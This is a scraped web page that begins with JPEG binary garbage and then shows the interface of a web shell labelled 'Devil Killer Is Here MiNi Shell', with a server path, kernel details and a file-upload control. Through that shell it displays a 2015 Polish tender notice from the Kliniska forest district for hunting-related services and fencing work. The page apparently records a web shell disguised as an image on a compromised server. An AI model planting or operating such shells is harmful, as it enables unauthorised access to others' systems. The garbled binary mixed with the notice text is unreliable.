JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150416/53467-N-2015.html

<p class="kh_header"><b>Kliniska Wielkie: USŁUGI W ZAKRESIE
GOSPODARKI ŁOWIECKIEJ 
W NADLEŚNICTWIE KLINISKA  NA TERENIE OHZ 
W SEZONIE ŁOWIECKIM 2015-2016</b><br>
<b>Numer ogłoszenia: 53467 - 2015; data zamieszczenia: 16.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Skarb Państwa - Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Kliniska , Pucko 1, 72-123 Kliniska Wielkie, woj. zachodniopomorskie, tel. 91 4312133, 4312124, faks 91 4181560.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kliniska.szczecin.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Skarb Państwa jednostka nieposiadająca osobowościprawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI W ZAKRESIE
GOSPODARKI ŁOWIECKIEJ 
W NADLEŚNICTWIE KLINISKA  NA TERENIE OHZ 
W SEZONIE ŁOWIECKIM 2015-2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Naganka podczas polowań zbiorowych (załącznik nr 6,Zadanie nr 1,  poz.8):
Jest zaplanowane łącznie 25 dni  polowań zbiorowych w sezonie łowieckim 2015-2016
Na każdym polowaniu musi być 8 naganiaczy
Wykonanie czynności obejmuje efektywne naganianie zwierzyny myśliwym
Stawka netto dotyczy kwoty jaka zostanie zapłacona za jednego naganiacza i jego psa naganiających jeden dzień
Dwóch naganiaczy będzie miało w obowiązku patroszenie pozyskanej zwierzyny
Wykonanie czynności obejmuje również ułożenie pozyskanej zwierzyny na przygotowanym pokocie

Pies w nagance (załącznik nr 6 ,Zadanie nr 1,  poz.9):
Jest zaplanowane łącznie 25 dni  polowań zbiorowych w sezonie łowieckim 2015-2016
Na każdego naganiacza musi przypadać przynajmniej jeden pies
Wykonanie czynności obejmuje efektywne naganianie zwierzyny myśliwym
Stawka netto dotyczy kwoty jaka zostanie zapłacona za jednego psa naganiającego jeden dzień
Leczenie psów ranionych przez zwierzynę podczas obsługi polowania będzie się odbywało na koszt Nadleśnictwa


Transport naganiaczy i ubitej zwierzyny (załącznik nr 6, Zadanie nr 1,  poz.10):
Jest zaplanowane łącznie 25 dni  polowań zbiorowych w sezonie łowieckim 2015-2016
Polowanie trwa 8 godzin dziennie
Przewidywane jest, że podczas polowania jeden pojazd pokona 100 kilometrów dziennie
Transport naganiaczy i upolowanej zwierzyny musi się odbywać pojazdami przystosowanymi do poruszania się po drogach leśnych 
Zwierzyna musi być przetransportowana, w pozycji wiszącej, do miejsca pokotu
Stawka netto za pracę jednego pojazdu obejmuje łącznie dwie stawki netto:                                                                                jedna - dotyczy kwoty za każdy kilometr transportu naganki i upolowanej zwierzyny,      druga - kwoty za każdą godzinę transportu

Przygotowanie pokotu  (załącznik nr 6, Zadanie nr 1,  poz.11):
Wykonanie czynności obejmuje położenie igliwia , na którym układna jest upolowana zwierzyna
Jest zaplanowane 7 polowań zbiorowych w sezonie łowieckim 2015-2016
Na każde polowanie zbiorowe pokot będzie przygotowywany jeden raz
Igliwie musi być rozłożone na powierzchni pozwalającej ułożyć całą upolowaną zwierzynę  
Stawka netto dotyczy kwoty za przygotowanie jednego pokotu

Transport myśliwych podczas polowania zbiorowego (załącznik nr 6,Zadanie nr 1,  poz.12):
Jest zaplanowane łącznie 25 dni  polowań zbiorowych w sezonie łowieckim 2015-2016
Polowanie trwa 8 godzin dziennie
Przewidywane jest, że podczas polowania jeden pojazd pokona 100 kilometrów dziennie
Na każdym polowaniu będzie 10 myśliwych
Transport myśliwych musi się odbywać pojazdami przystosowanymi do poruszania się po drogach leśnych 
Stawka netto za pracę jednego pojazdu obejmuje łącznie dwie stawki netto:                                                                                jedna - dotyczy kwoty za każdy kilometr transportu myśliwych                                            druga - dotyczy kwoty za każdą godzinę transportu myśliwych

Obsługa polowań indywidualnych (załącznik nr 6,Zadanie nr 1,  poz.13):
Polowania zostaną zrealizowane poprzez 240 wyjść z myśliwym
Wykonanie czynności polega na porannym i wieczornym wyjściu z myśliwym w łowisko i próbie podprowadzenia go do efektywnego strzału do zwierzyny
Podprowadzający musi mieć aktualne uprawnienia do wykonywania polowania 
Jeśli podprowadzający podprowadza myśliwego polującego na zwierzynę płową trofealną to podprowadzający musi mieć uprawnienia selekcjonerskie
Podprowadzający podejmuje ostateczną decyzję dokonania przez myśliwego dewizowego odstrzału sztuki zwierzyny
W obowiązku podprowadzającego jest wypatroszenie pozyskanej przez myśliwego dewizowego zwierzyny i w przypadku zwierzyny trofealnej odbicie trofeum  
Stawka netto dotyczy kwoty za jedno poranne lub wieczorne wyjście z myśliwym w łowisko

Preparacja trofeów - wieniec jelenia byka (załącznik nr 6,Zadanie nr 1,  poz.14):
Jest zaplanowanych 30 jeleni byków do pozyskania przez myśliwych dewizowych w sezonie łowieckim 2015-2016
Wykonanie czynności obejmuje wygotowanie i oczyszczenie łba z tkanki mięsnej oraz dostarczenie oczyszczonego trofeum przed zakończeniem pobytu myśliwego, który danego byka pozyskał
Stawka netto dotyczy kwoty za jeden wygotowany i oczyszczony wieniec z czaszką

Preparacja trofeów - parostki rogacza (załącznik nr 6,Zadanie nr 1,  poz.15):
Jest zaplanowanych 35 sarn rogaczy do pozyskania przez myśliwych dewizowych w sezonie łowieckim 2015-2016
Wykonanie czynności obejmuje wygotowanie i oczyszczenie łba z tkanki mięsnej oraz dostarczenie oczyszczonego trofeum przed zakończeniem pobytu myśliwego, który danego byka pozyskał
Stawka netto dotyczy kwoty za jedne wygotowane i oczyszczone parostki z czaszką

Preparacja trofeów - oręż dzika, (załącznik nr 6,Zadanie nr 1,  poz.16): 
Jest zaplanowanych 15 preparacji w sezonie łowieckim 2015-2016
Wykonanie czynności obejmuje wygotowanie i oczyszczenie oręża dzika (szable i fajki) z tkanki mięsnej oraz dostarczenie oczyszczonego trofeum przed zakończeniem pobytu myśliwego, który danego dzika pozyskał
Stawka netto dotyczy kwoty za jedno trofeum

Budowa ambony, jej transport i postawienie we wskazanym miejscu(załącznik nr 6,Zadanie nr 1,  poz.1) :
Przewidziana jest budowa 4 ambon w sezonie łowieckim 2015-2016
Stawka netto i brutto  dotyczy budowy jednej ambony
Materiał do budowy ambony organizuje Wykonawca
Ambonę należy zbudować zgodnie ze specyfikacją zawartą w załączniku    nr 7
Elementy nośne podstawy, skośne elementy stabilizujące podstawy, poprzeczne elementy stabilizujące oraz drabina muszą być wykonane z okorowanego surowca świerkowego lub modrzewiowego
Buda ambony musi być wykonana drewna sosnowego, świerkowego lub modrzewiowego
Betonowe podstawy (ustoje) muszą być przymocowane do elementów nośnych podstawy za pomocą dwóch cybantów
Łączenia elementów należy dokonywać za pomocą wkrętów lub gwoździ
Każdy punkt łączenia musi być wykonany za pomocą dwóch gwoździ lub dwóch wkrętów


Budowa zwyżki (wysiadki), jej transport i postawienie we wskazanym miejscu (załącznik nr 6, Zadanie nr 1,  poz.2):
Przewidziana jest budowa 30 zwyżek w sezonie łowieckim 2015-2016
Stawka netto i brutto dotyczy budowy jednej zwyżki
Materiał do budowy zwyżki organizuje Wykonawca
Zwyżkę należy zbudować zgodnie ze specyfikacją zawartą w załączniku    nr 8
Zwyżka musi być zbudowana z okorowanego materiału świerkowego lub sosnowego


Wykonanie lizawki i jej wkopanie we wskazanym miejscu (załącznik nr 6, Zadanie nr 1,  poz.3):
Przewidziane jest wykonanie 20 sztuk lizawek w sezonie łowieckim  2015-2016
Stawka netto i brutto dotyczy wykonania jednej lizawki
Materiał do wykonania lizawki dostarcza Nadleśnictwo
Lizawka musi być wykonana zgodnie ze specyfikacją zawartą w załączniku nr 9
Lizawka nie będzie okorowana

Remont ambony - podstawa:

Przewidziane jest 20 remontów podstaw ambon w sezonie łowieckim 2015-2016
Stawka netto i brutto dotyczy remontu podstawy jednej ambony 
Remont podstawy ambony polega na wymianie zniszczonych skośnych i poprzecznych elementów stabilizujących podstawy (załącznik nr 7) na nowe.
Materiał do remontu podstawy organizuje Wykonawca
Remont obejmuje również utylizację zniszczonych elementów ambony które zostały zdemontowane 


Remont ambony - zamontowanie betonowej podstawy (załącznik nr 6,Zadanie nr 1,  poz.5):
Przewidziane jest zamontowanie betonowych podstaw w 10 ambonach w sezonie łowieckim  2015-2016
Stawka netto i brutto dotyczy zamontowania czterech betonowych podstaw w jednej ambonie  
Zamontowanie betonowych podstaw obejmuje ich wkopanie oraz przymocowanie każdej podstawy dwoma cybantami do elementów nośnych podstawy ambony 
Materiał do wykonania remontu podstawy organizuje Wykonawca
Remont obejmuje również utylizację zniszczonych elementów ambony które zostały zdemontowane w postaci starych podstaw drewnianych i gwoździ

Remont ambony - wymiana drabiny (załącznik nr 6,Zadanie nr 1,  poz.6):
Przewidziana jest wymiana drabin w 5 ambonach w sezonie łowieckim 2015-2016
Stawka netto i brutto dotyczy wymiany drabiny w jednej ambonie  
Parametry techniczne i surowiec, z której została wykonana nowa drabina muszą być zgodne ze specyfikacją zawartą w załączniku numer 7
Materiał do wymiany drabiny organizuje Wykonawca
Remont obejmuje również utylizację starej drabiny


Budowa ogrodzenia chroniącego uprawy rolne przed szkodami od zwierzyny (załącznik nr 6,Zadanie nr 1,  poz.7):
Przewidziana jest budowa 6 kilometrów ogrodzenia w sezonie łowieckim 2014-2015
Ogrodzenie będzie miało jedną siatkę na całej długości przybitą skoblami do słupków (załącznik nr 11)
Materiał do budowy ogrodzenia dostarcza Nadleśnictwo
Stawka netto i brutto dotyczy kwoty jaką przyjmie wykonawca za wykonanie jednego metra bieżącego ogrodzenia 
Płot; instalacja pastucha (załącznik nr 6,Zadanie nr 1,  poz.17):
Przewidziana jest instalacja pastucha elektrycznego przytwierdzonego do płotu na odcinku 6 kilometrów
Wykonanie czynności polega na poprowadzeniu drutu o grubości 2 mm na izolatorach przytwierdzonych do słupków płotu tak jak jest to przedstawione na rysunku plot_pastuch
Płot; założenie siatki nylonowej (załącznik nr 6,Zadanie nr 1,  poz.18):
Przewidziane jest przymocowanie siatki nylonowej do ogrodzenia na odcinku 6 kilometrów
Stawka netto i brutto dotyczy założenia 1 metra bieżącego siatki
Wykonanie czynności polega na przytwierdzeniu nylonowej siatki do płotu z siatki leśnej tak jak to jest przedstawione na rysunku plot_siatka
Płot; budowa bram drewnianych (załącznik nr 6, Zadanie nr 1,  poz.19):

Przewidziana jest budowa 10 bram w płocie 
Wykonanie czynności polega na zbudowaniu stelażu dwóch skrzydeł z łat i przybiciu do niego siatki według rysunku plot_brama

Siatkę dostarcza Nadleśnictwo
Stawka netto i brutto dotyczy budowy 1 bramy

Materiał na stelaż organizuje wykonawca
Płot; budowa przełazów  (załącznik nr 6,Zadanie nr 1,  poz.20):
Przewidziana jest budowa 20 przełazów drabinowych przez ogrodzenie
Wykonanie czynności polega na budowie przełazu drabinowego zgodnie z rysunkiem plot przelaz
Materiał do budowy przełazów dostarcza Nadleśnictwo
Stawka netto i brutto dotyczy budowy jednego przełazu
Płot; demontaż (załącznik nr 6,Zadanie nr 1,  poz.21):
Przewidziany jest demontaż 500 metrów ogrodzenia
Wykonanie czynności polega na odbiciu od słupków i zwinięciu siatki oraz wyciągnięciu słupków
Wykonanie czynności obejmuje również transport słupków i siatki we wskazane miejsce 
Stawka netto i brutto dotyczy demontażu jednego metra bieżącego płotu
Pastuch a palikach; drut (załącznik nr 6,Zadanie nr 1,  poz.22):
Przewidziana jest budowa 20000 metrów pastucha z drutów chroniącego uprawy polne przed szkodami od zwierzyny
Wykonanie czynności polega na
Wbiciu słupków polipropylenowych co 7 metrów
Umieszczeniu na słupkach trzech drutów na wskazanych wysokościach
Zamontowaniu bram w postaci plastikowych rączek
W bramach i na załamaniach przebiegu pastucha wbiciu słupków drewnianych i przymocowaniu drutów za pomocą izolatorów 
Materiał do budowy pastucha dostarcza Nadleśnictwo
Stawka netto i brutto dotyczy budowy 1 metra bieżącego pastucha 
Pastuch na palikach; drut + siatka nylonowa (załącznik nr 6,Zadanie nr 1,  poz.23):
Przewidziana jest budowa 10000 metrów pastucha z drutów chroniącego uprawy polne przed szkodami od zwierzyny
Wykonanie czynności polega na
Wbiciu słupków polipropylenowych co 7 metrów
Umieszczeniu na słupkach trzech drutów na wskazanych wysokościach
Umieszczeniu na słupkach polipropylenowej siatki tak by nie dotykała drutów
Zamontowaniu bram w postaci plastikowych rączek
W bramach i na załamaniach przebiegu pastucha wbiciu słupków drewnianych i przymocowaniu drutów za pomocą izolatorów 
Materiał do budowy pastucha dostarcza Nadleśnictwo
Stawka netto i brutto dotyczy budowy 1 metra bieżącego pastucha
Pastuch na palikach; założenie siatki nylonowej (załącznik nr 6,Zadanie nr 1,  poz.24):
Przewidziane jest założenie siatki nylonowej na istniejący pastuch na odcinku 5000 metrów
Wykonanie czynności polega na założeniu siatki nylonowej na paliki istniejącego pastucha tak by nie dotykały drutu
Stawka netto i brutto dotyczy założenia 1 metra bieżącego siatki
Pastuch na palikach demontaż; drut (załącznik nr 6,Zadanie nr 1,  poz.25):
Przewidziany jest demontaż 20000 metrów pastucha z drutu i palików
Wykonanie czynności polega na nawinięciu drutu na szpule i zebraniu palików
Zwinięty na szpule drut i paliki muszą być złożone na Kwaterze Myśliwskiej Łęsko 
Stawka netto i brutto dotyczy demontażu 1 metra bieżącego pastucha
Pastuch na palikach demontaż; drut + siatka nylonowa (załącznik nr 6,Zadanie nr 1,  poz.26):
Przewidziany jest demontaż 10000 metrów pastucha z drutu, siatki nylonowej i palików
Wykonanie czynności polega na nawinięciu drutu na szpule, zwinięciu siatki w belę  i zebraniu palików
Zwinięty na szpule drut, siatka i paliki muszą być złożone na Kwaterze Myśliwskiej Łęsko
Stawka netto i brutto dotyczy demontażu 1 metra bieżącego pastucha
Pastuch; obsługa (załącznik nr 6,   Zadanie nr 1,  poz.27):
Przewidziana jest obsługa 150000 metrów pastucha
Wykonanie czynności polega na utrzymaniu pasa o szerokości 50 cm pod pastuchem na palikach i zainstalowanym na płocie
Stawka netto i brutto dotyczy obsługi 1 metra bieżącego pastucha
Utrzymanie pasa obejmuje:
Wykonanie oprysku
Wykoszenie roślinności dotykającej drut
Naciągnięcie drutów gdzie to konieczne
Wymianę połamanych izolatorów
Płot i pastuch; remont (łatanie dziur, łatanie przejść pod siatką) w płocie w pobliżu wsi Smogolice i wsi Przemocze  (załącznik nr 6,   Zadanie nr 1,  poz.28):
Przewidziane są 32 przejścia wzdłuż płotów i pastuchów w pobliżu wsi Przemocze i Smogolice 
Stawka netto i brutto dotyczy jednego przejścia wzdłuż płotu
Wykonanie czynności obejmuje
ousunięcie wszystkich obiektów dotykających drutów i powodujących przebicie 
ousunięcie drzew leżących na siatce i usunięcie szkód, które spowodowały.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.60.00.00-6, 77.23.11.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium:
8.1.	Oferta musi być zabezpieczona wadium w wysokości: 3.000,00 zł  słownie; trzy tysiące zł.
8.2.	Wadium należy wnieść w terminie do dnia 24.04.2015 r. do godz. 8:00  (włącznie) W przypadku wniesienia wadium w pieniądzu, za moment wniesienia wadium uznaje się moment uznania rachunku bankowego Zamawiającego. Stąd przy wnoszeniu wadium należy uwzględnić specyfikę działania banków.
8.3.	Wadium może być wnoszone w jednej lub kilku następujących formach:
1) pieniądzu: przelewem na rachunek bankowy Zamawiającego: konto BGŻ S.A. O/Szczecin 52 2030 0045 1110 0000 0055 6240. 
Wadium w formie gotówki nie będzie przyjmowane w kasie Nadleśnictwa. Wadium wnoszone w innych formach niż pieniądz należy deponować w kasie w siedzibie zamawiającego (p. nr 12);
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42 poz. 275, z późn. zm.)
8.4.	Wadium wniesione w pieniądzu Zamawiający przechowuje się na rachunku
          bankowym.
8.5.	Wykonawca zobowiązany jest wnieść wadium na okres związania ofertą.
8.6.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a PZP.
8.7.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
8.8.	Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
8.9.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 PZP, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
8.10.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
8.11.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 PZP, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy PZP lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
8.12.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza warunku w tym 
Zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza warunku w tym 
Zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza warunku w tym 
Zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza warunku w tym 
Zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza warunku w tym 
Zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

